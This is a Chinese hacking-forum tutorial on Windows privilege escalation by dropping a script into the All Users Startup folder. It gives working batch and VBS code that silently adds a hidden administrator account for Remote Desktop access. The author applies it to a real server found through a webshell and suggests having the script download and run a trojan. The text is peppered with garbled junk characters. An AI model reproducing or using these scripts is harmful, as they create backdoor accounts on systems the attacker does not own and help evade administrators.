  
- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
             
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是
# T2 M6 \4 x; i- E# j启动 提权
+ c( Q/ Q/ J- j, ~) X* x( P& JC:\Docume~1\All Users\「开始」菜单\程序\启动, w" _! n6 n! A7 Z; v
在这里必须有写入权限 否则此方法无效
( W) v, F/ F6 k+ J5 G5 ^! h, A, R因为我是在网吧 这里显示不了路径# D8 c5 _3 D! u/ p+ }. a
我去服务器上演示给大家看4 h6 z8 t, g# x N% b
大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
) e1 A% E# ?. G3 H H- ~文件 从而运行我们的文件
) S0 R* _( m) k! P4 J3 {+ M这里有两中方式 第一种是批处理: L: S1 V* r) u: _! x
我们来看下目前 我机器上的用户组
9 ?" _0 [) z# b* b; w目前我们没有521这个用户* b0 {& U3 L& |. s/ ?, Y
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示
7 N5 D4 o+ O% \+ A大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现" F$ W% o; r$ e
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
, ?9 G6 @5 G! }) x大家看 已经成功加入了WMMY用户- \( l" F4 U8 z2 ^, l- W0 E
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了3 m6 U5 F. R, Y
当前终端服务端口: 3389% k0 p( O" T) O; j
系统自动登录功能未开启$ g/ P; `8 E8 ~8 O) o
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
G6 u; C' v0 b6 [. CC:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
, z" C0 ^+ B7 d1 C% R- r第一种隐蔽性太差 我们就用第二种吧% V. v/ `8 n( @! ^9 Y0 x6 m
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去5 L! p& T1 w1 u# d3 Q& L
从而取得了3389的登陆权限
4 D. m; C# J% X- O" p2 E( G其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马7 q3 _7 s4 H5 U+ Y( d w
基本原理都差不多 我就不多介绍了
H/ ~, R/ H3 T' }- g0 Z教程结束```. q5 ]( o) ~# L( R
@echo off
( `% b) k/ V! r' i s7 O: d/ qnet user 521 521 /add+ |+ Y! y( V& M1 ]& g; l% t; ^
net localgroup administrators 521 /add' B: e5 ]4 o" L/ x7 r! a
8 @0 a4 v0 S6 ?0 @on Error Resume next
' |7 @3 _! ^- j M0 mset wshshell=createobject("wscript.shell"). q( z0 V7 w2 S$ W
a=wshshell.run("net user wmmy$ 1227 /add",0)" e; W( b+ J: u. F" ~+ _
a=wshshell.run("net localgroup administrators wmmy$ /add",0)
9 b. a P4 s9 g$ {7 F% u
2 o. `9 n9 S4 ?6 P" _
+ j) R4 q) g: A点击下载3 z) n* O( ^2 x! U
|
-
2
评分人数
-
|